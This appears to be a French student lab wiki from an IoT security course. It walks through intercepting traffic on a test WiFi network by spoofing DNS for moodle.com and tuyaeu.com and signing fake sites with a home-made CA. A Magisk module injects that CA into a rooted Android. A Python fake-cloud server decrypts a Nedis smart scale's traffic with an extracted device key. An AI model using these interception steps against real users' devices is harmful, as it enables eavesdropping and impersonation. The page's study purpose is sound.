..........|.-L..
i........
i........ ....>....
12:36:53.526624 IP 172.16.10.105.48314 > 172.16.10.1.8886: Flags [S], seq 6547, win 4380, options [mss 1460], length 0
E..,......O&..
i..
...".........`...!|........
12:36:53.526669 IP 172.16.10.1.8886 > 172.16.10.105.48314: Flags [R.], seq 0, ack 6548, win 0, length 0
E..(..@.@..E..
...
i"...........P...JA..
12:36:54.536817 IP 172.16.10.105.44185 > 172.16.10.1.8886: Flags [S], seq 6567, win 4380, options [mss 1460], length 0
E..,......O%..
i..
...".........`...1.........
12:36:54.536835 IP 172.16.10.1.8886 > 172.16.10.105.44185: Flags [R.], seq 0, ack 6568, win 0, length 0
E..(..@.@..E..
...
i"...........P...ZN..
12:36:55.545631 IP 172.16.10.105.26626 > 172.16.10.1.8886: Flags [S], seq 6589, win 4380, options [mss 1460], length 0
E..,......O$..
i..
.h.".........`...v
........
12:36:55.545649 IP 172.16.10.1.8886 > 172.16.10.105.26626: Flags [R.], seq 0, ack 6590, win 0, length 0
E..(..@.@..E..
...
i".h.........P.......
12:36:56.554680 IP 172.16.10.105.16244 > 172.16.10.1.8886: Flags [S], seq 6611, win 4380, options [mss 1460], length 0
E..,......O#..
i..
.?t".........`.............
12:36:56.554698 IP 172.16.10.1.8886 > 172.16.10.105.16244: Flags [R.], seq 0, ack 6612, win 0, length 0
E..(..@.@..E..
...
i".?t........P....G..
^C
57 packets captured
57 packets received by filter
0 packets dropped by kernel
</syntaxhighlight>port 8886 chez tuya ?

<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# openssl s_server -accept 8886 -cert /etc/ssl/apache/ca.crt -key /etc/ssl/apache/ca.key -debug
Using default temp DH parameters
ACCEPT
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 00 00 00 00 d6aG91IFR1eV....
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 00 ...:..BAohBAohb.
0010 - 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 00 00 00 00-00 00 00 00 00 00 00 00 d6aG............
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
</syntaxhighlight>trouver un mdp dans l'appli nedis /data/data/com.nedis.smartlife/shared_prefs

decouverte de tinytuya : https://github.com/jasonacox/tinytuya<syntaxhighlight lang="python3">
import socket
import tinytuya
import json

LOCAL_KEY = '674d29fb978a1705'

IP_BALANCE = '172.16.10.105'

print(f"[*] Démarrage du Faux Cloud Tuya...")
print(f"[*] Clé utilisée : {LOCAL_KEY}")

server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(('0.0.0.0', 8886))
server_socket.listen(1)

print("[*] En attente de la balance sur le port 8886...")
print("[*] Monte sur la balance maintenant !")

while True:
try:
client, addr = server_socket.accept()
print(f"\n[+] Connexion reçue de {addr[0]} !")

data = client.recv(4096)

if data:
print(f"[i] {len(data)} octets reçus (chiffrés). Tentative de décodage...")

try:
d = tinytuya.OutletDevice('DUMMY_ID', IP_BALANCE, LOCAL_KEY)
d.set_version(3.3) # Version standard WiFi

decrypted = d._decode_payload(data)

if decrypted:
print("\n" + "="*40)
print("donnés :")
print("="*40)
parsed = json.loads(decrypted)
print(json.dumps(parsed, indent=4))

if 'dps' in parsed:
print("\nVALEURS :")
for k, v in parsed['dps'].items():
print(f"- Data Point {k} : {v}")
print("="*40)
else:
print("[-] Échec du décryptage (Format inconnu ou clé incorrecte pour ce paquet)")

except Exception as e:
print(f"[-] Erreur de décodage : {e}")

client.close()

except KeyboardInterrupt:
print("\nArrêt.")
break
except Exception as e:
print(f"Erreur serveur : {e}")
</syntaxhighlight>

SE5 IdO sécurité des objets 2025/2026 b1

2025-12-11T15:28:26Z

Vdetrez : /* Ultime tentative */

[[Fichier:1107px-Titre page.png|sans_cadre|820x820px]]

= Serveur virtuel (17/09) =
Dans un premier temps, on vient créer un serveur virtuel sur <code>capbreton</code> avec la commande <code>xen-create-image --hostname=SE5.vdetrez --dhcp --dir=/usr/local/xen --size=10G --memory=2G --dist=daedalus --bridge=bridgeStudents</code>

Ensuite, sur capbreton dans le dossier <code>/etc/network/interfaces.d</code> on vient créer un fichier <code>g1_vdetrez</code> pour mettre en place une nouvelle interface dans le VLAN 410. <syntaxhighlight lang="linux-config">
auto Trunk.410
iface Trunk.410 inet manual
vlan-raw-device Trunk
up ip link set $IFACE up
down ip link set $IFACE down

auto g1_vdetrez
iface g1_vdetrez inet manual
bridge_ports Trunk.410
up ip link set $IFACE up
down ip link set $IFACE down

</syntaxhighlight>

On a maintenant accès à la machine SE5.vdetrez (en ayant évidemment fait l'erreur de mettre "." à la place de "-") et on vient y configurer nos adresses IPv4.

Mon adresse IPv4 routée est la <code>172.26.145.100</code> et mon IPv4 dans le VLAN 410 est <code>172.16.10.0</code> <syntaxhighlight lang="linux-config">
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.26.145.110
netmask 255.255.255.0
gateway 172.26.145.251
# post-up ethtool -K eth0 tx off

auto eth1
iface eth1 inet static
address 172.16.10.0/24
#
# The commented out line above will disable TCP checksumming which
# might resolve problems for some users. It is disabled by default
#

</syntaxhighlight>

On vérifie avec la commande <code>ip a</code><syntaxhighlight lang="linux-config">
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:41 brd ff:ff:ff:ff:ff:ff
inet 172.26.145.110/24 brd 172.26.145.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 2001:660:4401:6050:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 853sec preferred_lft 753sec
inet6 2a01:c916:2047:c850:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 2591853sec preferred_lft 604653sec
inet6 fe80::216:3eff:fe23:7441/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:42 brd ff:ff:ff:ff:ff:ff
inet 172.16.10.0/24 brd 172.16.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe23:7442/64 scope link
valid_lft forever preferred_lft forever

</syntaxhighlight>

Et on constate que notre serveur a accès à Internet avec la commande <code>ping 8.8.8.8</code>

= Point d'accès WiFi (29/09) =
Pour l'instant, nous mettons de côté ce point du TP car il n'est pas utile pour la suite.

= Sécurisation WiFi par WPA2-PSK =

Pour communiquer avec le routeur <code>Cisco</code>, on branche le port série en USB et on se connecte avec la commande <code>minicom -D /dev/ttyUSB0 -b 9600</code>. La première étape fut la création du SSID <code>SE5-SSID10</code>.<syntaxhighlight lang="linux-config">
dot11 ssid SE5-SSID10

vlan 410

authentication open

authentication key-management wpa version 2

wpa-psk ascii Cisco2025

exit
</syntaxhighlight>
Puis, on configure l'interface <code>Dot11Radio0</code><syntaxhighlight lang="linux-config">
interface dot11radio 0

encryption mode ciphers aes-ccm

ssid SE5-SSID10

station-role root

no shutdown
</syntaxhighlight>Après cela, on retourne sur notre serveur virtuel et on y implémente un serveur DHCP pour l'attribution des IP aux machines se connectant sur le routeur. On retrouve cette configuration dans <code>/etc/dhcp/dhcpd.conf</code><syntaxhighlight lang="linux-config">
# dhcpd.conf

option domain-name "plil.info";
option domain-name-servers ns.plil.info;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

authoritative;

subnet 172.16.10.0 netmask 255.255.255.0 {
range 172.16.10.100 172.16.10.200;
option domain-name-servers 172.16.10.1;
option routers 172.16.10.1;
default-lease-time 600;
max-lease-time 7200;
}
</syntaxhighlight>Puis, on implémente un serveur DNS minimal dans le fichier <code>/etc/bind/named.conf.options</code><syntaxhighlight lang="linux-config">
options {
directory "/var/cache/bind";

recursion yes;
allow-query {172.16.10.0/24; 127.0.0.1;};

forwarders {
8.8.8.8;
1.1.1.1;
};

dnssec-validation auto;

listen-on {127.0.0.1; 172.16.10.1;};
listen-on-v6 { none; };
};
</syntaxhighlight>Et enfin, on met en place une mascarade entre le VLAN 410 et le routeur du réseau des salles de projets pour donner l'accès à Internet.<syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

= Interception de flux (30/09) =

== Redirection par DNS ==
Pour cette partie, on va ajouter une zone primaire à notre serveur DNS avec le nom Internet du site que l'on veut rediriger vers notre machine.

Ici, ce sera le merveilleux <code>moodle.com</code>

D'abord, on modifie <code>/etc/bind/named.conf.local</code><syntaxhighlight lang="linux-config">
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "moodle.com" {
type master;
file "/etc/bind/db.moodle.com";
};
</syntaxhighlight>Puis, on crée la fameuse zone <code>db.moodle.com</code> dans le même répertoire <syntaxhighlight lang="linux-config">
$TTL 200
@ IN SOA ns.moodle.com. admin.moodle.com. (
5 ;
3600 ;
1800 ;
604800 ;
86400 ;
)
IN NS ns.moodle.com.
ns IN A 172.16.10.1
@ IN A 172.16.10.1
www IN CNAME ns
</syntaxhighlight>Pour vérifier si notre configuration est correcte, on exécute ces deux commandes :

<code>sudo named-checkconf</code>

<code>sudo named-checkzone moodle.com /etc/bind/db.moodle.com</code>

== Redirection réseau ==
Dans cette partie, on ajoute une règle <code>iptables</code> pour rediriger le flux TCP vers un port local, le <code>8080</code>.

<code>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-ports 8080</code><syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT 6 -- eth0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

== Serveur apache sécurise (04/10) ==

Dans un premier temps, on va créer un certificat auto-signé :

<code>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/apache/apache-selfsigned.key -out /etc/ssl/apache/apache-selfsigned.crt -subj "/C=FR/ST=Nord/L=Lille/O=Popo/CN=moodle.com"</code>

Puis, on configure <code>Apache2</code>
<syntaxhighlight lang="linux-config">
GNU nano 7.2 /etc/apache2/sites-available/secure-site.conf
<VirtualHost *:443>
ServerName moodle.com

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/apache/apache.crt
SSLCertificateKeyFile /etc/ssl/apache/apache.key

# Optionnel : log
ErrorLog ${APACHE_LOG_DIR}/ssl-error.log
CustomLog ${APACHE_LOG_DIR}/ssl-access.log combined
</VirtualHost>

# Redirection HTTP ^f^r HTTPS
<VirtualHost *:80>
ServerName moodle.com
Redirect permanent / https://moodle.com/
</VirtualHost>
</syntaxhighlight>

Maintenant, en prévision de la suite (voir explication dans Machine virtuelle Android), on va créer une autorité de certification nommée CertiFiable :

<code>openssl req -x509 -new -nodes -keyout ca.key -sha256 -days 365 -out ca.crt -subj "/CN=CertiFiable"</code>

Puis, on vient générer une demande de signature de certificat :

<code>openssl req -new -newkey rsa:2048 -nodes -keyout apache.key -out apache.csr -subj "/CN=moodle.com"</code>

Enfin, on vient signer le site avec le certificat de CertiFiable :

<code>openssl x509 -req -in apache.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out apache.crt -days 365 -sha256</code>

= Machine virtuelle <code>android</code> =

== Première tentative ==
Actuellement, si on navigue sur internet et que l'on se rend sur moodle.com, on atterrit bien sûr le faux Moodle, mais comme le téléphone ne connait pas l'autorité de certification nommé CertiFiable, on a le droit à ce magnifique message de connexion non sécurisée :

[[Fichier:Avertissement moodle.png|sans_cadre]][[Fichier:Moodle le magnifique.png|sans_cadre]]

Malheureusement, il est aujourd'hui impossible d'ajouter facilement une autorité de certification sur son téléphone.

C'est pour cela qu'une solution proposée est d'installer une machine virtuelle d'une ancienne version d'<code>Android</code> où il était possible d'en ajouter.

En ayant suivi ce tuto (https://help.clouding.io/hc/en-us/articles/4405454393756-How-to-virtualize-Android-with-QEMU-KVM), j'ai réussi à installer une VM sur Zabeth4 (j'ai dû prendre une autre iso car celle du site était inaccessible).

J'ai installé <code>VNC Viewer</code> pour pouvoir manipuler la machine virtuelle.

En étant sur la VM, j'ai pu me rendre compte qu'il n'était pas possible de se connecter au WiFi, c'est la connexion du pc qui est simulé comme un réseau WiFi dans la VM.

J'ai pu réfléchir à deux solutions avant que la VM ne crash d'elle-même et soit impossible à redémarrer...

La première est toute simple, connecter la Zabeth directement au WiFi, ce qui est difficile à distance. La seconde, qui est je pense possible, est de changer la carte réseau dans les fichiers de conf de la VM pour mettre celle supportant le WiFi.

Je n'ai donc pu tester aucune de ces deux solutions, la VM n'étant plus.

== Seconde tentative ==

qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw

qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw -cdrom *android-x86*.iso -boot d

qemu-system-x86_64 -m 2048 -enable-kvm -cpu host -smp 2 -display sdl -drive file=android.img,format=raw,if=virtio -usb -device usb-host,vendorid=0x148f,productid=0x5370

== Ultime tentative ==
Cette fois ci j'utilise l'application Android Studio qui permet d'émuler des téléphones Android pour le débogage d'application. On va donc s'en servir pour créer un Android routé qui va recevoir notre certificat.

Dans un premier temps j'ai donc routé mon téléphone avec l'utilitaire Magisik en suivant ce tutoriel : https://www.youtube.com/watch?v=QzsNn3GhYYk&t=374s.

Puis je viens ajouter un module dans Magisk qui permet de recharger à chaque demarrage du téléphone le certificat en question.

Le certificat peut être ajouter dans le téléphone en utilisant la commande <code>adb push xyzxyzxyz.0</code> .

La manipulation est la suivante :<syntaxhighlight lang="linux-config">
adb shell
su
cd /data/adb/modules/
mkdir -p tuya_cert/system/etc/security/cacerts
echo "id=tuya_cert" > tuya_cert/module.prop echo "name=Tuya Certificate Injection" >> tuya_cert/module.prop echo "version=1.0" >> tuya_cert/module.prop echo "versionCode=1" >> tuya_cert/module.prop echo "author=Victo" >> tuya_cert/module.prop echo "description=Injecte le certificat Tuya dans le systeme" >> tuya_cert/module.prop
touch tuya_cert/auto_mount
cp /sdcard/Download/26e33623.0 /data/adb/modules/tuya_cert/system/etc/security/cacerts/
chmod 644 /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
chown root:root /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
reboot
</syntaxhighlight>On a donc maintenant une VM Android avec notre certificat. Il faut maintenant que le PC qui host cette VM soit connecté à notre borne WiFi pour pouvoir constater que notre site Moodle.com est bien redirigé et sécurisé.

= Machine <code>Android</code> (06/10) =
Pour cette dernière partie, j'ai retrouvé une tablette sous <code>Android 4.4 KitKat</code> qui permet d'ajouter des autorités de certification.

C'est donc ce que j'ai fait :

[[Fichier:Photo_certifiable.png|sans_cadre]]

Maintenant, on constate en se connectant sur moodle.com à partir de cette tablette que l'on est bien redirigé vers le faux site et qu'il est sécurisé avec le magnifique cadenas vert.

[[Fichier:Photo moodle.png|sans_cadre]]

(cette page web date du 06/10/25, elle n'est plus valable depuis le 10/10/25...)

= Nedis Wi-Fi Smart Personal Scales =

Dans ce second TP, nous allons jouer avec ce pèse personne de nedis.

Dans un premier temps, j'ai connecté la balance au réseau SE5-SSID10.

Puis j'ai remarqué que quand je tentais de me peser, la balance affichait err2.

Après une courte investigation, il s'agit d'une balance qui émet des signaux électriques pour analyser la composition corporelle donc si on se pèse avec des chaussures, cela pose problème.

Pour la suite du projet, on se pèsera avec les mains.

[[Fichier:Poid_sur_app_nedis.png|sans_cadre]]

On constate sur ces paquets la requête de la balance pour obtenir une IP, puis le moment ou elle l'obtient.

[[Fichier:WS connection balance.png|sans_cadre|858x858px]]

Je peux donc ping ma balance depuis mon pc (celui qui host ma VM android)

[[Fichier:PIng balance.png|sans_cadre]]

<code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">
14:46:51.115996 IP 172.16.10.105.49153 > 172.16.10.1.53: 13861+ A? m2.tuyaeu.com. (31)
14:46:51.125611 IP 172.16.10.1.53 > 172.16.10.105.49153: 13861 3/0/0 A 3.120.92.134, A 18.184.31.90, A 35.156.44.172 (79)
14:46:51.168250 IP 172.16.10.105.49153 > 172.16.10.1.53: 59035+ A? a3.tuyaeu.com. (31)
14:46:51.177967 IP 172.16.10.1.53 > 172.16.10.105.49153: 59035 3/0/0 A 18.198.62.99, A 18.158.227.228, A 3.67.116.46 (79)
14:46:51.703179 IP 172.16.10.102.57661 > 172.16.10.1.53: 30982+ AAAA? a1.tuyaeu.com. (31)
14:46:51.706085 IP 172.16.10.102.57662 > 172.16.10.1.53: 15654+ A? a1.tuyaeu.com. (31)
14:46:51.713159 IP 172.16.10.1.53 > 172.16.10.102.57661: 30982 3/0/0 AAAA 2a05:d014:afa:af02:262a:be09:e328:ff21, AAAA 2a05:d014:afa:af01:87dc:dc67:35a1:5bfe, AAAA 2a05:d014:afa:af00:1ee2:1f00:e061:e8bf (115)
14:46:51.715736 IP 172.16.10.1.53 > 172.16.10.102.57662: 15654 3/0/0 A 3.78.92.3, A 35.159.150.3, A 3.121.33.91 (79)

56 packets captured
56 packets received by filter
0 packets dropped by kernel
[4343449.827028] device eth1 left promiscuous mode

</syntaxhighlight>visiblement notre balance communique avec tuya via m2.tuyaeu.com et a3.tuyaeu.com. Par la suite on constate qu'elle communique avec une multitude de XY.tuyaeu.com.

Maintenant on refait une config similaire à moodle.com, une zone "tuyaeu.com" dans le fichier de conf de bind, un fichier db.tuyaeu.com et une page apache. Enfin on vient la signer avec notre autorité de certification.

<code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# tcpdump -i eth1 -n port 53
[5544865.540418] device eth1 entered promiscuous mode
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes
12:30:55.146437 IP 172.16.10.1.53 > 172.16.10.100.17620: 23156 5/0/0 CNAME reddit.map.fastly.net., A 151.101.129.140, A
151.101.1.140, A 151.101.65.140, A 151.101.193.140 (129)
12:30:55.168796 IP 172.16.10.1.53 > 172.16.10.100.24249: 64622 2/0/0 CNAME us-central1-gcp.api.sc-gw.com., A 35.190.43.
134 (109)
12:30:55.322498 IP 172.16.10.100.26394 > 172.16.10.1.53: 29420+ A? scontent-cdg4-1.xx.fbcdn.net. (46)
12:30:56.095075 IP 172.16.10.100.62675 > 172.16.10.1.53: 46396+ A? cf-st.sc-cdn.net. (34)
12:30:56.121796 IP 172.16.10.1.53 > 172.16.10.100.62675: 46396 1/0/0 A 3.163.248.4 (50)
12:30:56.539099 IP 172.16.10.1.53 > 172.16.10.100.26394: 29420 1/0/0 A 185.60.219.2 (62)
12:30:57.289763 IP 172.16.10.100.7071 > 172.16.10.1.53: 14247+ A? usc1-gcp-v62.api.snapchat.com. (47)
12:30:57.302767 IP 172.16.10.1.53 > 172.16.10.100.7071: 14247 2/0/0 CNAME usc1-gcp-v62.api.sc-gw.com., A 34.120.159.232
(103)
12:30:58.490060 IP 172.16.10.105.49153 > 172.16.10.1.53: 50294+ A? m2.tuyaeu.com. (31)
12:30:58.490174 IP 172.16.10.1.53 > 172.16.10.105.49153: 50294* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:30:58.540041 IP 172.16.10.105.49153 > 172.16.10.1.53: 23785+ A? a3.tuyaeu.com. (31)
12:30:58.540132 IP 172.16.10.1.53 > 172.16.10.105.49153: 23785* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:31:00.979103 IP 172.16.10.100.63625 > 172.16.10.1.53: 63574+ A? gql-fed.reddit.com. (36)
12:31:00.997721 IP 172.16.10.1.53 > 172.16.10.100.63625: 63574 5/0/0 CNAME reddit.map.fastly.net., A 151.101.65.140, A
151.101.129.140, A 151.101.193.140, A 151.101.1.140 (135)
12:31:04.461507 IP 172.16.10.102.63971 > 172.16.10.1.53: 20792+ A? discord.com. (29)
12:31:04.461519 IP 172.16.10.102.54572 > 172.16.10.1.53: 15444+ Type65? discord.com. (29)
12:31:04.493098 IP 172.16.10.1.53 > 172.16.10.102.63971: 20792 5/0/0 A 162.159.138.232, A 162.159.136.232, A 162.159.12
8.233, A 162.159.135.232, A 162.159.137.232 (109)
12:31:04.493306 IP 172.16.10.1.53 > 172.16.10.102.54572: 15444 1/0/5 Type65 (158)
18 packets captured
18 packets received by filter
0 packets dropped by kernel

</syntaxhighlight>tcpdump -i eth1 host 172.16.10.105 and not port 53 -A<syntaxhighlight lang="linux-config">
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes
